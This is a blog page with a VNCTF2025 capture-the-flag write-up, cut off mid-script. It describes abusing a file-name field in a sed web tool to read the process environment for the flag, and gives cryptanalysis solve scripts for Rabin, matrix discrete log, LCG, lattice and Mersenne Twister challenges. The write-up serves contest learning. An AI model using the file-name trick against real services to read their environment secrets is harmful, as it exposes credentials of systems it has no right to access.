

<!DOCTYPE html>
<html lang="zh-CN" >



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/assets/title.gif">
  <link rel="icon" href="/assets/title.gif">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="WuYan">
  <meta name="keywords" content="">
  
    <meta name="description" content="差点卡死的签到以及漏了忘做的签退。。。">
<meta property="og:type" content="article">
<meta property="og:title" content="VNCTF2025 writeup">
<meta property="og:url" content="http://13.250.14.141/2025/02/09/VNCTF2025/index.html">
<meta property="og:site_name" content="WuYan&#39;s eave">
<meta property="og:description" content="差点卡死的签到以及漏了忘做的签退。。。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://13.250.14.141/img/VNCTF2025/VNCTF.png">
<meta property="article:published_time" content="2025-02-09T05:44:55.000Z">
<meta property="article:modified_time" content="2025-02-09T06:03:13.982Z">
<meta property="article:author" content="WuYan">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://13.250.14.141/img/VNCTF2025/VNCTF.png">
  
  
  
  <title>VNCTF2025 writeup - WuYan&#39;s eave</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"13.250.14.141","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>WuYan</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/assets/girl.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="VNCTF2025 writeup"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-02-09 13:44" pubdate>
          2025年2月9日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.8k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          24 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar category-bar" style="margin-right: -1rem">
    





<div class="category-list">
  
  
    
    
    
    <div class="category row nomargin-x">
      <a class="category-item 
          list-group-item category-item-action col-10 col-md-11 col-xm-11" title="CTF writeup"
        id="heading-61eec73aca74595bf77af749a8323605" role="tab" data-toggle="collapse" href="#collapse-61eec73aca74595bf77af749a8323605"
        aria-expanded="true"
      >
        CTF writeup
        <span class="list-group-count">(2)</span>
        <i class="iconfont icon-arrowright"></i>
      </a>
      
      <div class="category-collapse collapse show" id="collapse-61eec73aca74595bf77af749a8323605"
           role="tabpanel" aria-labelledby="heading-61eec73aca74595bf77af749a8323605">
        
        
          
  <div class="category-post-list">
    
    
      
      
        <a href="/2025/01/17/ZJUCTF2024wp/" title="ZJUCTF2024 writeup"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">ZJUCTF2024 writeup</span>
        </a>
      
    
      
      
        <a href="/2025/02/09/VNCTF2025/" title="VNCTF2025 writeup"
           class="list-group-item list-group-item-action
           active">
          <span class="category-post">VNCTF2025 writeup</span>
        </a>
      
    
  </div>

        
      </div>
    </div>
  
</div>


  </aside>


    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">VNCTF2025 writeup</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="welcome"><strong>Welcome</strong></h1>
<p>签到做了一个小时，我还有救吗😇</p>
<h2 id="欢迎">欢迎</h2>
<ul>
<li>打开网页是一个命令执行窗口，可以执行sed指令对文件内容的<code>&#123;&#125;</code>进行替换； <img src="/img/VNCTF2025/VNCTF2025_1.png" srcset="/img/loading.gif" lazyload alt="alt text" /></li>
<li>替换词和文件名是可以更改的，并且给出了提示flag在环境变量内部，一开始的思路是将替换词改为环境变量中的变量，但是由于单引号不能自动展开变量，而且替换词内过滤了单引号的闭合(可以执行多条指令)，因此如下方法也是不行的： <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">sed <span class="hljs-string">&#x27;s/&#123;.*&#125;/&#x27;</span><span class="hljs-string">&quot;<span class="hljs-variable">$FLAG</span>&quot;</span><span class="hljs-string">&#x27;/g&#x27;</span> ./example.txt<br></code></pre></td></tr></table></figure></li>
<li>那就只能在文件名处动手脚了，直接读取进程的环境变量文件，得到flag： <img src="/img/VNCTF2025/VNCTF2025_2.png" srcset="/img/loading.gif" lazyload alt="alt text" /></li>
</ul>
<h1 id="crypto"><strong>Crypto</strong></h1>
<p>大部分都是爆破，时间差点不够🤪</p>
<h2 id="easymath">easymath</h2>
<ul>
<li>题目给了密文<code>c=pow(flag,2,N)</code>，其中N是由三个质数而得的，并且提供了<code>(x - n[0]) * (x - n[1]) * (x - n[2])</code>展开后的多项式；</li>
<li>首先通过sage分解多项式得到三个大质数的解： <img src="/img/VNCTF2025/VNCTF2025_3.png" srcset="/img/loading.gif" lazyload alt="alt text" /></li>
<li>解决<code>c=pow(flag,2,N)</code>使用Rabin算法，其中的三个质因数都是模四余三的大质数，那么可得 $ m c^ mod ; p_i $，三组同余方程可以用中国剩余定理，脚本如下： <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> Crypto.Util.number <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">import</span> gmpy2<br><br>N = <span class="hljs-number">1</span> <br>n = [<span class="hljs-number">5487564316951417093934647798659941512646442958127439071827</span>, <span class="hljs-number">5908636118089697338533572785710162817248001570348495067227</span>, <span class="hljs-number">3868765709106144154703556118635822400623994075212553582411</span>]<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> n:<br>    N*=i<br>c = <span class="hljs-number">24884251313604275189259571459005374365204772270250725590014651519125317134307160341658199551661333326703566996431067426138627332156507267671028553934664652787411834581708944</span><br>c1 = n[<span class="hljs-number">0</span>]-<span class="hljs-built_in">pow</span>(c,(n[<span class="hljs-number">0</span>]+<span class="hljs-number">1</span>)//<span class="hljs-number">4</span>,n[<span class="hljs-number">0</span>])<br>c2 = n[<span class="hljs-number">1</span>]-<span class="hljs-built_in">pow</span>(c,(n[<span class="hljs-number">1</span>]+<span class="hljs-number">1</span>)//<span class="hljs-number">4</span>,n[<span class="hljs-number">1</span>])<br>c3 = <span class="hljs-built_in">pow</span>(c,(n[<span class="hljs-number">2</span>]+<span class="hljs-number">1</span>)//<span class="hljs-number">4</span>,n[<span class="hljs-number">2</span>])<br>N1 = N // n[<span class="hljs-number">0</span>]<br>N2 = N // n[<span class="hljs-number">1</span>]<br>N3 = N // n[<span class="hljs-number">2</span>]<br>M1 = gmpy2.invert(N1, n[<span class="hljs-number">0</span>])<br>M2 = gmpy2.invert(N2, n[<span class="hljs-number">1</span>])<br>M3 = gmpy2.invert(N3, n[<span class="hljs-number">2</span>])<br>m = (c1 * N1 * M1 + c2 * N2 * M2 + c3 * N3 * M3) % N<br><span class="hljs-keyword">assert</span> <span class="hljs-built_in">pow</span>(m,<span class="hljs-number">2</span>,N)==c<br><span class="hljs-built_in">print</span>(long_to_bytes(m))<br></code></pre></td></tr></table></figure> <img src="/img/VNCTF2025/VNCTF2025_4.png" srcset="/img/loading.gif" lazyload alt="alt text" /></li>
</ul>
<h2 id="ss0hurt">ss0Hurt</h2>
<ul>
<li>题目的关键代码： <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">process</span>(<span class="hljs-params">self, x, y, z</span>):<br>    <span class="hljs-keyword">return</span> vector([<span class="hljs-number">5</span> * x + y - <span class="hljs-number">5</span> * z, <span class="hljs-number">5</span> * y - z, <span class="hljs-number">5</span> * z])<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">Mat</span>(<span class="hljs-params">self, m</span>):<br>    PR = <span class="hljs-variable language_">self</span>.P[<span class="hljs-string">&#x27;x,y,z&#x27;</span>]<br>    x,y,z = PR.gens()<br>    <span class="hljs-keyword">if</span> m != <span class="hljs-number">0</span>:<br>        plana = <span class="hljs-variable language_">self</span>.Mat(m//<span class="hljs-number">2</span>)<br>        planb = plana(*plana)<br>        <span class="hljs-keyword">if</span> m % <span class="hljs-number">2</span> == <span class="hljs-number">0</span>:<br>            <span class="hljs-keyword">return</span> planb<br>        <span class="hljs-keyword">else</span>:<br>            <span class="hljs-keyword">return</span> <span class="hljs-variable language_">self</span>.process(*planb)<br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">return</span> <span class="hljs-variable language_">self</span>.process(*PR.gens())<br></code></pre></td></tr></table></figure></li>
<li>给定一个初始向量V，<code>Mat</code>函数的加密过程就是给V乘上一个矩阵G，得到最后的结果向量Y，假设输入密文为m，则加密过程为 $ G<sup>{m+2</sup>{m.bit_lenth()}} V = Y$；</li>
<li>参考<a target="_blank" rel="noopener" href="https://triodelzx.github.io/2024/07/12/%E8%8B%A5%E5%B0%94%E5%BD%93%E6%A0%87%E5%87%86%E5%9E%8B%E4%B8%8E%E7%9F%A9%E9%98%B5%E7%A6%BB%E6%95%A3%E5%AF%B9%E6%95%B0%E9%97%AE%E9%A2%98/">矩阵离散对数问题</a>编写解题脚本： <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> Crypto.Util.number <span class="hljs-keyword">import</span>*<br><span class="hljs-keyword">from</span> sage.<span class="hljs-built_in">all</span> <span class="hljs-keyword">import</span>*<br><br>G = [[<span class="hljs-number">5</span>,<span class="hljs-number">1</span>,-<span class="hljs-number">5</span>],[<span class="hljs-number">0</span>,<span class="hljs-number">5</span>,-<span class="hljs-number">1</span>],[<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">5</span>]]<br>V = [[<span class="hljs-number">2025</span>],[<span class="hljs-number">208</span>],[<span class="hljs-number">209</span>]]<br>Y = [[<span class="hljs-number">17199707718762989481733793569240992776243099972784327196212023936622130204798694753865087501654381623876011128783229020278210160383185417670794284015692458326761011808048967854332413536183785458993128524881447529380387804712214305034841856237045463243243451585619997751904403447841431924053651568039257094910</span>], [<span class="hljs-number">62503976674384744837417986781499538335164333679603320998241675970253762411134672614307594505442798271581593168080110727738181755339828909879977419645331630791420448736959554172731899301884779691119177400457640826361914359964889995618273843955820050051136401731342998940859792560938931787155426766034754760036</span>], [<span class="hljs-number">93840121740656543170616546027906623588891573113673113077637257131079221429328035796416874995388795184080636312185908173422461254266536066991205933270191964776577196573147847000446118311985331680378772920169894541350064423243733498672684875039906829095473677927238488927923581806647297338935716890606987700071</span>]]<br><br>p = <span class="hljs-number">106743081253087007974132382690669187409167641660258665859915640694456867788135702053312073228376307091325146727550371538313884850638568106223326195447798997814912891375244381751926653858549419946547894675646011818800255999071070352934719005006228971056393128007601573916373180007524930454138943896336817929823</span><br>n = <span class="hljs-number">3</span><br><br>M_G = matrix(GF(p),G)<br>v = matrix(GF(p),V)<br>y = matrix(GF(p),Y)<br><br>J, P = M_G.jordan_form(subdivide = <span class="hljs-literal">False</span>,transformation = <span class="hljs-literal">True</span>)<br>t = P**-<span class="hljs-number">1</span> * v<br>z = P**-<span class="hljs-number">1</span> * y<br>lambda0 = J[n-<span class="hljs-number">1</span>][n-<span class="hljs-number">1</span>]<br><br>x = lambda0 * (t[n-<span class="hljs-number">1</span>][<span class="hljs-number">0</span>]*z[n-<span class="hljs-number">2</span>][<span class="hljs-number">0</span>] - t[n-<span class="hljs-number">2</span>][<span class="hljs-number">0</span>]*z[n-<span class="hljs-number">1</span>][<span class="hljs-number">0</span>]) * inverse(<span class="hljs-built_in">int</span>(t[n-<span class="hljs-number">1</span>][<span class="hljs-number">0</span>]*z[n-<span class="hljs-number">1</span>][<span class="hljs-number">0</span>]),p) % p<br>m = <span class="hljs-built_in">int</span>(x)<br>m = m&amp;((<span class="hljs-number">1</span>&lt;&lt;(m.bit_length()-<span class="hljs-number">1</span>))-<span class="hljs-number">1</span>)<br><br><span class="hljs-built_in">print</span>(long_to_bytes(<span class="hljs-built_in">int</span>(m)))<br></code></pre></td></tr></table></figure> <img src="/img/VNCTF2025/VNCTF2025_5.png" srcset="/img/loading.gif" lazyload alt="alt text" /></li>
</ul>
<h2 id="simple-prediction">Simple prediction</h2>
<ul>
<li>题目分为两部分，第一部分是一个变式LCG随机数破解，只要找出两组即以上的间隔相同的四个LCG随机数便可以通过求公约数得到模数n，详细推导见<a target="_blank" rel="noopener" href="https://zer0yu.github.io/2018/11/02/Cracking-LCG/">博客</a>，再根据模数便可求出增量和乘数，根据列表中是否为真LCG随机数求出flag对应的0/1位； <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> gmpy2 <span class="hljs-keyword">import</span> invert,gcd<br><br><span class="hljs-comment"># 列表n过长不显</span><br>knownlis = n[<span class="hljs-number">2</span>+<span class="hljs-number">8</span>*<span class="hljs-number">2</span>:<span class="hljs-number">6</span>+<span class="hljs-number">8</span>*<span class="hljs-number">2</span>]<br>difflis = [knownlis[i+<span class="hljs-number">1</span>]-knownlis[i] <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">3</span>)]<br>n1 = difflis[<span class="hljs-number">1</span>]*difflis[<span class="hljs-number">1</span>]-difflis[<span class="hljs-number">0</span>]*difflis[<span class="hljs-number">2</span>]<br>knownlis = n[<span class="hljs-number">8</span>*<span class="hljs-number">3</span>:<span class="hljs-number">8</span>*<span class="hljs-number">4</span>:<span class="hljs-number">2</span>]<br>difflis = [knownlis[i+<span class="hljs-number">1</span>]-knownlis[i] <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">3</span>)]<br>n2 = difflis[<span class="hljs-number">1</span>]*difflis[<span class="hljs-number">1</span>]-difflis[<span class="hljs-number">0</span>]*difflis[<span class="hljs-number">2</span>]<br>n_mod = gcd(n1,n2)<br><span class="hljs-built_in">print</span>(n_mod,n_mod.bit_length())<br><br>knownlis = n[<span class="hljs-number">2</span>+<span class="hljs-number">8</span>*<span class="hljs-number">2</span>:<span class="hljs-number">6</span>+<span class="hljs-number">8</span>*<span class="hljs-number">2</span>]<br>m = ((knownlis[<span class="hljs-number">2</span>]-knownlis[<span class="hljs-number">1</span>])*invert(knownlis[<span class="hljs-number">1</span>]-knownlis[<span class="hljs-number">0</span>],n_mod))%n_mod<br>c = (knownlis[<span class="hljs-number">1</span>]-knownlis[<span class="hljs-number">0</span>]*m)%n_mod<br><span class="hljs-keyword">assert</span> (m*knownlis[<span class="hljs-number">2</span>]+c)%n_mod==knownlis[<span class="hljs-number">3</span>]<br>flag1 = <span class="hljs-string">&quot;&quot;</span>.join([<span class="hljs-built_in">bin</span>(<span class="hljs-built_in">ord</span>(i))[<span class="hljs-number">2</span>:].zfill(<span class="hljs-number">8</span>) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-string">&quot;VN&quot;</span>])+<span class="hljs-string">&quot;01&quot;</span><br>s = n[<span class="hljs-number">2</span>+<span class="hljs-number">8</span>*<span class="hljs-number">2</span>]<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">2</span>+<span class="hljs-number">8</span>*<span class="hljs-number">2</span>,<span class="hljs-built_in">len</span>(n)):<br>    <span class="hljs-keyword">if</span> s==n[i]:<br>        flag1+=<span class="hljs-string">&#x27;0&#x27;</span><br>    <span class="hljs-keyword">else</span>:<br>        flag1+=<span class="hljs-string">&#x27;1&#x27;</span><br>    s = (m*s+c)%n_mod<br>flag1 = <span class="hljs-string">&quot;&quot;</span>.join([<span class="hljs-built_in">chr</span>(<span class="hljs-built_in">int</span>(flag1[i:i+<span class="hljs-number">8</span>],<span class="hljs-number">2</span>)) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-built_in">len</span>(flag1),<span class="hljs-number">8</span>)])<br><span class="hljs-built_in">print</span>(flag1)<br></code></pre></td></tr></table></figure></li>
<li>第二部分是一道经典的格基规约问题，根据 $(m^e ; mod ; n) c $ 构造矩阵并用sage库进行格基规约。但是由于第二部分的flag长度不确定，需要爆破长度： <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> sage.<span class="hljs-built_in">all</span> <span class="hljs-keyword">import</span> *<br>n = <span class="hljs-number">16880924655573626811763865075201881594085658222047473444427295924181371341406971359787070757333746323665180258925280624345937931067302673406166527557074157053768756954809954623549764696024889104571712837947570927160960150469942624060518463231436452655059364616329589584232929658472512262657486196000339385053006838678892053410082983193195313760143294107276239320478952773774926076976118332506709002823833966693933772855520415233420873109157410013754228009873467565264170667190055496092630482018483458436328026371767734605083997033690559928072813698606007542923203397847175503893541662307450142747604801158547519780249</span><br>e = <span class="hljs-number">65537</span><br>c = <span class="hljs-number">9032357989989555941675564821401950498589029986516332099523507342092837051434738218296315677579902547951839735936211470189183670081413398549328213424711630953101945318953216233002076158699383482500577204410862449005374635380205765227970071715701130376936200309849157913293371540209836180873164955112090522763296400826270168187684580268049900241471974781359543289845547305509778118625872361241263888981982239852260791787315392967289385225742091913059414916109642527756161790351439311378131805693115561811434117214628348326091634314754373956682740966173046220578724814192276046560931649844628370528719818294616692090359</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">10</span>,<span class="hljs-number">100</span>-<span class="hljs-number">32</span>):<br>    knownm = [idx+<span class="hljs-number">0x1234</span> <span class="hljs-keyword">for</span> idx <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(i)]<br>    knownc = [<span class="hljs-built_in">pow</span>(m,e,n) <span class="hljs-keyword">for</span> m <span class="hljs-keyword">in</span> knownm]<br>    matrix = [[<span class="hljs-number">0</span>]*(i+<span class="hljs-number">2</span>) <span class="hljs-keyword">for</span> _ <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(i+<span class="hljs-number">2</span>)]<br>    <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(i):<br>        matrix[j][j] = <span class="hljs-number">1</span><br>        matrix[j][-<span class="hljs-number">1</span>] = knownc[j]<br>    matrix[i][i] = <span class="hljs-number">1</span><br>    matrix[i][-<span class="hljs-number">1</span>] = c<br>    matrix[i+<span class="hljs-number">1</span>][-<span class="hljs-number">1</span>] = n<br>    A = Matrix(matrix)<br>    B = A.LLL()<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> B[<span class="hljs-number">0</span>]:<br>        <span class="hljs-keyword">if</span> i&gt;<span class="hljs-number">128</span>:<br>            <span class="hljs-keyword">break</span><br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">break</span><br>flag2 = <span class="hljs-string">&quot;&quot;</span>.join([<span class="hljs-built_in">chr</span>(i) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> B[<span class="hljs-number">0</span>][:-<span class="hljs-number">2</span>]])<br><span class="hljs-built_in">print</span>(flag2)<br></code></pre></td></tr></table></figure> <img src="/img/VNCTF2025/VNCTF2025_6.png" srcset="/img/loading.gif" lazyload alt="alt text" /></li>
</ul>
<h2 id="并非rc4">并非RC4</h2>
<ul>
<li>题目提供的RC4中加密盒数据交换有错误，因此在经过多次加密后加密盒内的数据将退化成同一个数字，最终演化成一个破解python伪随机数生成的问题： <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python">sbox[i] = sbox[j]  <br>sbox[j] = sbox[i]<br></code></pre></td></tr></table></figure></li>
<li>之前也做过类似的题目，具体推导过程参考<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/205861#h3-9">博客</a>，需要跑出一个19968*19968的转换矩阵再对猜测加密盒退化数字后的随机数处理恢复梅森旋转算法最开始的状态state，验证后便可破解随机数解密RSA；</li>
<li>生成矩阵的代码： <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> sage.<span class="hljs-built_in">all</span> <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> random <span class="hljs-keyword">import</span> Random<br><span class="hljs-keyword">from</span> tqdm <span class="hljs-keyword">import</span> tqdm<br><br>prng = Random()<br>length = <span class="hljs-number">19968</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">myState</span>():<br>    state = [<span class="hljs-number">0</span>]*<span class="hljs-number">624</span><br>    i = <span class="hljs-number">0</span><br>    <span class="hljs-keyword">while</span> i&lt;length:<br>        ind = i//<span class="hljs-number">32</span><br>        expont = i%<span class="hljs-number">32</span><br>        state[ind] = <span class="hljs-number">1</span>&lt;&lt;(<span class="hljs-number">31</span>-expont)<br>        <span class="hljs-keyword">yield</span> (<span class="hljs-number">3</span>,<span class="hljs-built_in">tuple</span>(state+[<span class="hljs-number">0</span>]),<span class="hljs-literal">None</span>)<br>        state[ind] = <span class="hljs-number">0</span><br>        i += <span class="hljs-number">1</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">getRow</span>():<br>    rng = Random()<br>    gs = myState()<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(length):<br>        s = <span class="hljs-built_in">next</span>(gs)<br>        rng.setstate(s)<br>        row = vector(GF(<span class="hljs-number">2</span>),[<span class="hljs-built_in">int</span>(x) <span class="hljs-keyword">for</span> z <span class="hljs-keyword">in</span> [rng.getrandbits(<span class="hljs-number">8</span>) <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(length//<span class="hljs-number">8</span>)] <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> <span class="hljs-built_in">bin</span>(z)[<span 